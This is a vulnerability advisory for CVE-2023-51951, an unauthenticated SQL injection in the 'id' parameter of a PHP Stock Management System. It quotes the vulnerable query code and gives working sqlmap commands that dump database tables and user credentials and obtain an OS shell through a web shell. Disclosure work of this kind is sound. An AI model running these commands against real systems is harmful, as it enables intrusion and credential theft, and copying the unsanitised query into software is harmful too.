Vendor | |
Product | Stock Management System |
Affected Version(s) | 1 and probably prior |
Tested Version(s) | 1 |
Vendor Notification | 18 December 2023 |
Advisory Publication | 18 December 2023 [without technical details] |
Vendor Fix | N/A |
Public Disclosure | 18 December 2023 |
Latest Modification | 18 December 2023 |
CVE Identifier | CVE-2023-51951 |
Product Description | This is a Stock Management System in PHP and MySQL Database that provides an online and automated platform for shops or businesses. |
Credits | Josué Cruz Mier Security Researcher & Penetration Tester @wizlynx group |
SQL Injection | |||
Severity: Critical | CVSS Score: 9.8 | CWE-ID: CWE-89 | Status: Open |
Vulnerability Description | |||
The web application Stock Management System is affected by an unauthenticated SQL Injection affecting Version 1.0. An SQL injection occurs when a value originating from the client's request is used within a SQL query without proper sanitisation. This could allow attackers to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components. | |||
CVSS Base Score | |||
Attack Vector | Network | Scope | Changed |
Attack Complexity | Low | Confidentiality Impact | High |
Privileges Required | None | Integrity Impact | High |
User Interaction | None | Availability Impact | High |
Source code: https://www.sourcecodester.com/php/15023/stock-management-system-phpoop-source-code.html
Vulnerability location: /sms/admin/purchase_order/manage_bo.php, id parameter
Line 3 of manage_bo.php invokes a SQL query built with input that comes from an untrusted source, specifically provided in the 'id' parameter. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands.
<?php
if(isset($_GET['id'])){
$qry = $conn->query("SELECT p.*,s.name as supplier FROM purchase_order_list p inner join supplier_list s on p.supplier_id = s.id where p.id = '{$_GET['id']}'");
if($qry->num_rows >0){
foreach($qry->fetch_array() as $k => $v){
$$k = $v;
}
}
}
?>
... omitted for brevity ...
By sending in the id field the single quote character, the application returns an error message indicating the application is most likely vulnerable to SQL injection:
Extracting information via SQL injection Demonstration
Using SQLmap, we will automate the SQL injection exploitation to retrieve data from the database by using a technique based on error messages provided by the application:
Command: sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb --dbs
The screenshot above tells us five databases are available. We will now enumerate all tables within the sms_db database:
#sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db --tables
We can proceed to the next step which consists of extracting data within a table. As illustrated in the screenshot below, we were able to extract information from the users table:
#sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb -D sms_db -T users -C username,password --dump
Additionally, we were able to upload a web shell and execute commands directly from sqlmap as shown in the screenshot below:
#sqlmap -u "http://localhost/sms/admin/?page=purchase_order/manage_po&id=1" -p id --flush-session --technique=E --level=5 --risk=3 --dbms=mariadb –os-shell